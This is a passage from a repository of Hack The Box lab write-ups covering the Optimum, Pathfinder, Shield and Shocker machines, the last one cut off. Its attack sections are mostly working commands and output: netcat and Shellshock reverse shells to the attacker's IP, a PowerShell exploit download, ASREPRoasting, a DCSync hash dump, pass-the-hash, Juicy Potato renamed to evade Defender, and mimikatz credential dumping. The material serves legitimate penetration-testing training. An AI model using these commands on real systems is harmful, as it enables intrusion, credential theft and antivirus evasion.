66 | vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
67 | exe= "exec|"+vbs2
68 | vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
69 | exe1= "exec|"+vbs3
70 | script_create()
71 | execute_script()
72 | nc_run()
73 | except:
74 | print """[.]Something went wrong..!
75 | Usage is :[.] python exploit.py
76 | Don't forgot to change the Local IP address and Port number on the script"""
77 |
78 | ```
79 |
80 | If everything is setup correctly, we can run the script and receive a reverse shell:
81 |
82 | ```
83 | C:\Users\kostas\Desktop>whoami
84 | whoami
85 | optimum\kostas
86 | ```
87 |
88 | Instead of using this script, the vulnerability can also be manually exploited, by creating a Powershell reverse shell (watch e.g. `Ippsec`: https://www.youtube.com/watch?v=kWTnVBIpNsE).
89 |
90 | Also a Metasploit exploit module is available.
91 |
92 |
93 | ## Privilege Escalation
94 |
95 | Now that we have access to the server, we can look for a way to escalate our privileges. Therefore, we copy the `systeminfo` output to our local machine and use `Windows-Exploit-Suggester` (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to identify a possible vulnerability.
96 |
97 | Going through the list, I stumbled upon this vulnerability: https://www.exploit-db.com/exploits/41020 ([Details](https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/), [Binary](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe)).
98 |
99 | As wget and curl are both not available for our current user, we have to use Powershell.
100 |
101 | ```
102 | PowerShell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.26/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
103 | ```
104 |
105 | Afterwards, we can use the exploit to obtain system privileges.
106 |
107 | ```
108 | C:\Users\Public\Downloads>41020.exe
109 | 41020.exe
110 | Microsoft Windows [Version 6.3.9600]
111 | (c) 2013 Microsoft Corporation. All rights reserved.
112 |
113 | C:\Users\Public\Downloads>whoami
114 | whoami
115 | nt authority\system
116 | ```
117 |
118 | ## Post-Exploitation
119 |
120 | User Flag
121 | ```
122 | type user.txt.txt
123 | d0c39409d7b994a9a1389ebf38ef5f73
124 | ```
125 |
126 | Root Flag
127 |
128 | ```
129 | type root.txt
130 | 51ed1b36553c8461f4552c2e92b3eeed
131 | ```
--------------------------------------------------------------------------------
/Optimum/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Optimum/pics/logo.png
--------------------------------------------------------------------------------
/Optimum/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Optimum/pics/website.png
--------------------------------------------------------------------------------
/Pathfinder/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Pathfinder
2 |
3 | ## Enumeration
4 |
5 | ```
6 | PORT STATE SERVICE REASON VERSION
7 | 53/tcp open domain syn-ack Simple DNS Plus
8 | 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-01-04 22:00:22Z)
9 | 135/tcp open msrpc syn-ack Microsoft Windows RPC
10 | 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
11 | 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
12 | 445/tcp open microsoft-ds? syn-ack
13 | 464/tcp open kpasswd5? syn-ack
14 | 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
15 | 636/tcp open tcpwrapped syn-ack
16 | 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
17 | 3269/tcp open tcpwrapped syn-ack
18 | 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
19 | |_http-server-header: Microsoft-HTTPAPI/2.0
20 | |_http-title: Not Found
21 | 9389/tcp open mc-nmf syn-ack .NET Message Framing
22 | 47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
23 | |_http-server-header: Microsoft-HTTPAPI/2.0
24 | |_http-title: Not Found
25 | 49664/tcp open msrpc syn-ack Microsoft Windows RPC
26 | 49665/tcp open msrpc syn-ack Microsoft Windows RPC
27 | 49666/tcp open msrpc syn-ack Microsoft Windows RPC
28 | 49667/tcp open msrpc syn-ack Microsoft Windows RPC
29 | 49671/tcp open msrpc syn-ack Microsoft Windows RPC
30 | 49676/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
31 | 49677/tcp open msrpc syn-ack Microsoft Windows RPC
32 | 49683/tcp open msrpc syn-ack Microsoft Windows RPC
33 | 49698/tcp open msrpc syn-ack Microsoft Windows RPC
34 | 49718/tcp open msrpc syn-ack Microsoft Windows RPC
35 | Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
36 | ```
37 |
38 | There are many ports open! Port 88 is typically associated with Kerberos and port 389 with LDAP, which indicates that this is a Domain Controller.
39 |
40 | ## Preparation
41 | Using the credentials we obtained in a previous machine; `sandra:Password1234!`, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a python bloodhound ingester. It can be installed using pip: `pip install bloodhound`
42 |
43 | Then run
44 | ```
45 | python3 -m bloodhound -d megacorp.local -u sandra -p 'Password1234' -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
46 | ```
47 | This will store several json files in the current directory, which will later be imported into Bloodhound.
48 |
49 | The next step is to install `neo4j`, which is an open source graph database.
50 | ```
51 | $ sudo apt install neo4j
52 | $ sudo neo4j console
53 | ```
54 | Afterwards go to `localhost:7474`, connect to the database with the credentials `neoj4:neo4j` and change the password.
55 |
56 | The last step is to install bloodhound. BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths.
57 |
58 | Run it with:
59 |
60 | ```
61 | sudo bloodhound --no-sandbox
62 | ```
63 |
64 | It will open a GUI and will ask you for your database credentials, which you have set up when configuring neo4j.
65 |
66 | Then, upload all the json files into Bloodhound.
67 |
68 | ## Analysis
69 |
70 | Bloodhound offeres several Pre-Built Analysis queries
71 |
72 | 
73 |
74 | Choosing the "FInd Principles with DCSync Rights", we can see that the svc_bes has GetChangesAll privileges to the domain. This means that the account has the ability to request replication data from the domain controller, and gain sensitive information such as user hashes.
75 |
76 | 
77 |
78 | ## Exploitation
79 |
80 | It's worth checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket's GetNPUsers.
81 |
82 | ```
83 | $ python3 GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
84 | Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
85 |
86 | [*] Getting TGT for svc_bes
87 | $krb5asrep$23$svc_bes@MEGACORP.LOCAL:d71a0a828dafb52440d7161c2a46d29c$7eaf00d192586f0c3aa80e8ae980e7e6428c71df4fde76885a5da8aa39cf4a21b0ed392d15a22147d50b3bed445a655de8b3aebe5cd7ecb07a94faad74ed5000c14ec727d5e932ac30cf9fc634ee62d1340088f3cac2c944617c502a7845334cccb9f73129b03e4ca2c7caa95d05475e33ad467bc2faa440976b56484b6ecfa053dce6ce430bceb3517ac5a68a5139eea944bf83581c04a9be9b154a480461b5cfff2e87bb9a322262d3a48116eba863a77ad8da1497a6b1aa353e66fdfce21af5db3a5e972f95516ddce0b05c287338258ed73c4b1cef7dde5fd02b7e750cb7e745a1707e11b4e636a04fdc896586db
88 | ```
89 |
90 | We obtain the TGT ticket for the `svc_bes` and save it to a file called hash. Now we have to crack it with a tool e.g `john`
91 |
92 | ```
93 | $ sudo john hash -w=/usr/share/wordlists/rockyou.txt
94 | [sudo] password for ctf:
95 | Using default input encoding: UTF-8
96 | Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
97 | Press 'q' or Ctrl-C to abort, almost any other key for status
98 | Sheffield19 ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
99 | 1g 0:00:00:26 DONE (2021-01-04 15:23) 0.03743g/s 396967p/s 396967c/s 396967C/s Sheffwed1..Sheethead?
100 | Use the "--show" option to display all of the cracked passwords reliably
101 | Session completed
102 | ```
103 |
104 | It is now possible to access the server as svc_bes using WinRM, and gain user.txt (password: Sheffield19)
105 |
106 | ```
107 | evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
108 | ```
109 |
110 | The user.txt is located on svc_bes's Desktop: `b05fb166688a8603d970c6d033f637f1`
111 |
112 | ## Privilege Escalation
113 | In order to leverage the GetChangesAll permission, we can use Impacket's secretsdump.py to perform a DCSync attack and dump the NTLM hashes of all domain users.
114 |
115 | ```
116 | $ python3 secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
117 | Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
118 |
119 | [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
120 | [*] Using the DRSUAPI method to get NTDS.DIT secrets
121 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
122 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
123 | krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
124 | svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
125 | sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
126 | PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:4daaf43d62196be359323e580d7d1a22:::
127 | [*] Kerberos keys grabbed
128 | Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
129 | Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
130 | Administrator:des-cbc-md5:f1c89e75a42cd0fb
131 | krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
132 | krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
133 | krbtgt:des-cbc-md5:d0f8d0c86ee9d997
134 | svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
135 | svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
136 | svc_bes:des-cbc-md5:1cc16e37ef8940b5
137 | sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
138 | sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
139 | sandra:des-cbc-md5:23988f7a9d679d37
140 | PATHFINDER$:aes256-cts-hmac-sha1-96:9746728aa86c802b483aa9304887a8b60e5f5d5895bfd1c182dbaa5f684226f3
141 | PATHFINDER$:aes128-cts-hmac-sha1-96:a45fe07f2fc61fbebafce78f73a97644
142 | PATHFINDER$:des-cbc-md5:e364941fc7ef5dd3
143 | [*] Cleaning up...
144 | ```
145 |
146 | Using the default domain administrator NTLM hash, we can use this in a PTH attack to gain elevated access to the system. For this, we can use Impacket's psexec.py.
147 |
148 | ```
149 | psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
150 | ```
151 |
152 | And we are root! Now we can obtain the root.txt which is located in C:\Users\Administrator\Desktop: `ee613b2d048303e5fd4ac6647d944645`
153 |
--------------------------------------------------------------------------------
/Pathfinder/pics/bloodhound-analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Pathfinder/pics/bloodhound-analysis.png
--------------------------------------------------------------------------------
/Pathfinder/pics/bloodhound_output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Pathfinder/pics/bloodhound_output.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Hack the Box - Writeups
2 |
3 | ## Starting point
4 |
5 | - [Oopsie](Oopsie) [Linux, Web, Cookies]
6 | - [Vaccine](Vaccine) [Linux, Web, John, SQL Injection]
7 | - [Shield](Shield) [Windows, Wordpress, Metasploit]
8 | - [Pathfinder](Pathfinder) [Windows, Active Directory, Kerberos, Attack Graph]
9 | - [Included](Included) [Linux, Web, LFI, Upload, lxc]
10 | - [Markup](Markup) [Windows, XXE]
11 | - [Guard](Guard) [Linux, Restricted Shell, Cracking]
12 | - [Base](Base) [Linux, PHP authentication, Directory Discovery]
13 |
14 | ## Machines
15 |
16 | - [Lame](Lame) [Linux, smb]
17 | - [Legacy](Legacy) [Windows, well known vulnerability]
18 | - [Beep](Beep) [Linux, LFI, FreePBX, elastix, vtigerCRM, SMTP]
19 | - [Devel](Devel) [Windows, IIS, Priv-Esc]
20 | - [Optimum](Optimum) [Windows, HttpFileServer, Priv-Esc]
21 | - [Bank](Bank) [Linux, DNS, Routing]
22 | - [Blocky](Blocky) [Linux, SQL, Wordpress]
23 | - [Shocker](Shocker) [Linux, well known vulnerability, cgi]
24 | - [Mirai](Mirai) [Linux, well known vulnerability, data recovery]
25 | - [Valentine](Valentine) [Linux, well known vulnerability]
26 | - [Laboratory](Laboratory) [Linux, Gitlab RCE/LFI]
27 | - [Academy](Academy) [Linux, Laravel]
28 | - [Doctor](Doctor)[Linux, SSTI, splunk]
29 |
30 | ## Challenges
31 |
32 | - [RE: Find The Easy Pass](FindTheEasyPass) [exe]
33 |
--------------------------------------------------------------------------------
/Shield/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Shield
2 |
3 | ## Enumeration
4 |
5 | ```
6 | PORT STATE SERVICE REASON VERSION
7 | 80/tcp open http syn-ack Microsoft IIS httpd 10.0
8 | | http-methods:
9 | | Supported Methods: OPTIONS TRACE GET HEAD POST
10 | |_ Potentially risky methods: TRACE
11 | |_http-server-header: Microsoft-IIS/10.0
12 | |_http-title: IIS Windows Server
13 | 3306/tcp open mysql syn-ack MySQL (unauthorized)
14 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
15 | ```
16 |
17 | ### Examining Port 80 - Windows Server Internet Information Service (IIS)
18 |
19 | 
20 |
21 | Navigating to Port 80, we can see the default IIS starting page (which is typical for Windows Server hosted websites). So we probably have to find the real application/directories by ourselves.
22 |
23 | Therefore, we gonna use a tool like `gobuster`:
24 | ```
25 | gobuster dir -u "http://10.10.10.29" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
26 | ```
27 |
28 | It relatively quickly finds a directory called `/wordpress`. Let's head over to this.
29 |
30 | 
31 |
32 | The wordpress website is apparently a company's website that deals with electric trucks. It has two big buttons, which both have no functionality. Furthermore, it has an additional tab called `BLOG`, which leads us to their blog (also implemented with wordpress).
33 |
34 | 
35 |
36 | On the blog-website, we also have the possibility to Login, which leads us to following website:
37 |
38 | 
39 |
40 | I tried bruteforcing the login with username `admin`, as Wordpress has the bad behaviour of leaking usernames. It basically gives you a different error message, if you guessed the username correctly.
41 |
42 | 
43 |
44 | 
45 |
46 | Unfortunately, I had no success in doing so. After a few hours of research, I took a look at the official writeup of the room... In the writeup they state: `Since we have already acquired the password P@s5w0rd!, we can try to login to the WordPress site.`..Wait. Where and how did we acquire that exactly? That's what I asked in the official Discord server. Their answer was pretty much like "That's the password of the DB user in the previous machine! It's obvious that you should test that password for the Wordpress admin in this machine" .... riiiiiiight.
47 |
48 | Anyway...
49 |
50 | ## Exploitation
51 | Now that we are logged in with the **obvious** credentials `admin:P@s5w0rd!`, and have full access to the Wordpress admin dashboard, we can setup a reverse shell to the server. We gonna use `metasploit` for that, as windows systems are always a bit tricky.
52 |
53 | So we open `msfconsole` and search for a suiteable module.
54 |
55 | 
56 |
57 | We type `use 0` to select this module. Afterwards we type `show options` to see all the options we can and must set.
58 |
59 | 
60 |
61 | After configuring it for our machine like that:
62 |
63 | 
64 |
65 | we can start the exploit.
66 |
67 | 
68 |
69 | By typing `sysinfo` we get some information about the system:
70 |
71 | ```
72 | meterpreter > sysinfo
73 | Computer : SHIELD
74 | OS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
75 | Meterpreter : php/windows
76 | ```
77 |
78 | We see that this is a rather old Windows Server version. Let's see if it has any know vulnerabilities regarding privilege escalation.
79 |
80 | And indeed! It's called `Rotten Potato` ([Github](https://github.com/foxglovesec/RottenPotato), [Youtube](https://www.youtube.com/watch?v=8Wjs__mWOKI)). For our case, we will use a slight modification of that exploit called `Juicy Potato` ([Github]( https://github.com/ohpe/juicy-potato/)).
81 |
82 | ### Upload Netcat
83 |
84 | Download `nc.exe` from [here](https://github.com/int0x33/nc.exe/blob/master/nc.exe). Afterwards, change the directory in your meterpreter session to
85 | ```
86 | C:/inetpub/wwwroot/wordpress/wp-content/uploads
87 | ```
88 | Then upload the `nc.exe` file. To execute it use following command:
89 |
90 | ```
91 | msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.125 1234"
92 | ```
93 |
94 | This only works ofc, if you have a nc listerner running.
95 |
96 | ### Prepare the Juicy Potato Exploit
97 |
98 | We can create a batch file that will be executed by the exploit and return a SYSTEM shell. Let's add the following contents to `shell.bat` (run it from the nc reverse shell).
99 |
100 | ```
101 | echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.125 1111 > shell.bat
102 | ```
103 |
104 | Now start another nc listener on your local machine with the port specified in `shell.bat`.
105 |
106 | Afterwards, we upload the Juicy Pototo exe with an uncommon name (I chose jp.exe), so that the windows defender won't detect it.
107 |
108 | The final step is to execute the Juicy Potato exe with the previously generated `shell.bat` file like so:
109 |
110 | ```
111 | jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
112 | ```
113 |
114 | 
115 |
116 | The root.txt is located in C:\Users\Administrator\Desktop: `6e9a9fdc6f64e410a68b847bb4b404fa`
117 |
118 | ## Post Exploitation
119 |
120 | [Mimikatz](https://github.com/sebastiendamaye/hackthebox/raw/master/01-starting_point/04-Shield/files/mimikatz.exe) can be used to find additional cached passwords on the machine. This might be useful for the next challenge.
121 |
122 | So we upload the exe from the meterpreter session and execute it:
123 |
124 | ```
125 | meterpreter > upload mimikatz.exe
126 | ```
127 |
128 | Then do following in the System shell:
129 |
130 | ```
131 | $ .\mimikatz.exe
132 |
133 | $ mimikatz> sekurlsa::logonpasswords
134 |
135 | ...
136 |
137 | Authentication Id : 0 ; 216075 (00000000:00034c0b)
138 | Session : Interactive from 1
139 | User Name : sandra
140 | Domain : MEGACORP
141 | Logon Server : PATHFINDER
142 | Logon Time : 1/4/2021 11:12:16 AM
143 | SID : S-1-5-21-1035856440-4137329016-3276773158-1105
144 | msv :
145 | [00000003] Primary
146 | * Username : sandra
147 | * Domain : MEGACORP
148 | * NTLM : 29ab86c5c4d2aab957763e5c1720486d
149 | * SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
150 | * DPAPI : f4c73b3f07c4f309ebf086644254bcbc
151 | tspkg :
152 | wdigest :
153 | * Username : sandra
154 | * Domain : MEGACORP
155 | * Password : (null)
156 | kerberos :
157 | * Username : sandra <-- USERNAME
158 | * Domain : MEGACORP.LOCAL
159 | * Password : Password1234! <-- PASSWORD
160 | ssp :
161 | credman :
162 |
163 | ...
164 | ```
165 |
166 | The found credentials are `sandra:Password1234!`.
--------------------------------------------------------------------------------
/Shield/pics/blog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/blog.png
--------------------------------------------------------------------------------
/Shield/pics/error1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/error1.png
--------------------------------------------------------------------------------
/Shield/pics/error2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/error2.png
--------------------------------------------------------------------------------
/Shield/pics/metasploit_filled_options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_filled_options.png
--------------------------------------------------------------------------------
/Shield/pics/metasploit_options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_options.png
--------------------------------------------------------------------------------
/Shield/pics/metasploit_run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_run.png
--------------------------------------------------------------------------------
/Shield/pics/metasploit_search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_search.png
--------------------------------------------------------------------------------
/Shield/pics/system_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/system_shell.png
--------------------------------------------------------------------------------
/Shield/pics/webserver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/webserver.png
--------------------------------------------------------------------------------
/Shield/pics/wordpress.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/wordpress.png
--------------------------------------------------------------------------------
/Shield/pics/wp_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/wp_login.png
--------------------------------------------------------------------------------
/Shocker/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Shocker (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.1.175 -- -sC -sV -o port_scan
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
12 | | http-methods:
13 | |_ Supported Methods: GET HEAD POST OPTIONS
14 | |_http-server-header: Apache/2.4.18 (Ubuntu)
15 | |_http-title: Site doesn't have a title (text/html).
16 | 2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18 | ```
19 |
20 | ### Examine Port 80 - Apache Server
21 |
22 | 
23 |
24 | Accessing Port 80 via the browser, we only see a picture. Guess we have to enumerate the webserver and search for other directories using `gobuster`:
25 |
26 | ```
27 | └──╼ $ gobuster dir -u "10.129.1.175" -w /usr/share/wordlists/dirb/big.txt
28 | ===============================================================
29 | Gobuster v3.0.1
30 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
31 | ===============================================================
32 | [+] Url: http://10.129.1.175
33 | [+] Threads: 10
34 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt
35 | [+] Status codes: 200,204,301,302,307,401,403
36 | [+] User Agent: gobuster/3.0.1
37 | [+] Timeout: 10s
38 | ===============================================================
39 | 2021/01/19 08:47:59 Starting gobuster
40 | ===============================================================
41 | /.htaccess (Status: 403)
42 | /.htpasswd (Status: 403)
43 | /cgi-bin/ (Status: 403)
44 | /server-status (Status: 403)
45 | ```
46 |
47 | Gobuster reveals two additional directories: `cgi-bin` and `server-status`. While server-status is rather not interesting, cgi-bin can lead to serious vulnerabilities such as ShellShock.
48 |
49 | ### Shellshock
50 | Shellshock is effectively a Remote Command Execution vulnerability in Bash that is caused by the fact that BASH (versions 1.0.3 - 4.3) incorrectly executes trailing commands when it imports a function definition stored in an environment variable:
51 |
52 | ```
53 | env x= '() { :;}; echo vulnerable' bash -c "echo test"
54 | ```
55 |
56 | Vulnerable versions of Bash interpret `x='() { :;};'` as a function definition for a function named x. The function body is simply `:` (colon), which is a Bash-builtin that does nothing and returns with exit code 0. While importing the function, it also executes the code following it - `echo vulnerable`. The overall output is
57 |
58 | ```
59 | vulnerable
60 | test
61 | ```
62 |
63 | ### Exploiting Shellshock
64 |
65 | As the machine is also called Shocker, I assume that this is the vulnerability that we should exploit. So let's see if we can find some vulnerable scripts in the directory.
66 |
67 | Those scripts are mostly written in bash, perl, python or have the cgi extension. We can use gobuster again to scan the directory!
68 |
69 | ```
70 | gobuster dir -u "10.129.1.175/cgi-bin/" -w /usr/share/wordlists/dirb/common.txt -x sh,pl,cgi,py
71 | ===============================================================
72 | Gobuster v3.0.1
73 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
74 | ===============================================================
75 | [+] Url: http://10.129.1.175/cgi-bin/
76 | [+] Threads: 10
77 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt
78 | [+] Status codes: 200,204,301,302,307,401,403
79 | [+] User Agent: gobuster/3.0.1
80 | [+] Extensions: cgi,sh,pl,py
81 | [+] Timeout: 10s
82 | ===============================================================
83 | 2021/01/19 09:13:54 Starting gobuster
84 | ===============================================================
85 | /user.sh (Status: 200)
86 |
87 | ```
88 |
89 | If we access the file via the browser, it asks us to download the response of the script:
90 |
91 | ```
92 | └──╼ $ cat user.sh
93 | Content-Type: text/plain
94 |
95 | Just an uptime test script
96 |
97 | 03:16:23 up 32 min, 0 users, load average: 0.19, 0.15, 0.09
98 | ```
99 |
100 | The script apparently executes the command `uptime`.
101 |
102 | *When a webserver uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the reuqest to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used* (https://github.com/opsxcq/exploit-CVE-2014-6271)
103 |
104 | ## Gaining an Initial Foothold
105 |
106 | To establish a reverse shell, we first set up our netcat listener and then execute following:
107 |
108 | ```
109 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4444 0>&1" http://10.129.1.175/cgi-bin/user.sh
110 | ```
111 |
112 | This will exploit the Shellshock vulnerability and create a reverse shell for us. Of course this can also be done with Burp or some scripts or even modules from Metasploit. But I usually prefer to do it manually.
113 |
114 | 
115 |
116 | ## Privilege Escalation
117 |
118 | Checking the available commands that can be executed with sudo, we see that our current user shelly can execute perl with sudo privileges.
119 | ```
120 | shelly@Shocker:/home/shelly$ sudo -l
121 | Matching Defaults entries for shelly on Shocker:
122 | env_reset, mail_badpass,
123 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
124 |
125 | User shelly may run the following commands on Shocker:
126 | (root) NOPASSWD: /usr/bin/perl
127 | ```
128 |
129 | Now it's rather easy:
130 |
131 | ```
132 | shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
133 | # id
134 | uid=0(root) gid=0(root) groups=0(root)
135 | ```
136 |
137 | We are root!
--------------------------------------------------------------------------------
/Shocker/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/logo.png
--------------------------------------------------------------------------------
/Shocker/pics/reverse_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/reverse_shell.png
--------------------------------------------------------------------------------
/Shocker/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/website.png
--------------------------------------------------------------------------------
/Vaccine/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Vaccine
2 |
3 | ## Enumeration
4 |
5 | ```
6 | rustscan 10.10.10.46 -- -sC -sV -o port_scan
7 |
8 | PORT STATE SERVICE REASON VERSION
9 | 21/tcp open ftp syn-ack vsftpd 3.0.3
10 | 22/tcp open ssh syn-ack OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
11 | 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
12 | | http-cookie-flags:
13 | | /:
14 | | PHPSESSID:
15 | |_ httponly flag not set
16 | | http-methods:
17 | |_ Supported Methods: GET HEAD POST OPTIONS
18 | |_http-server-header: Apache/2.4.41 (Ubuntu)
19 | |_http-title: MegaCorp Login
20 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
21 | ```
22 |
23 |
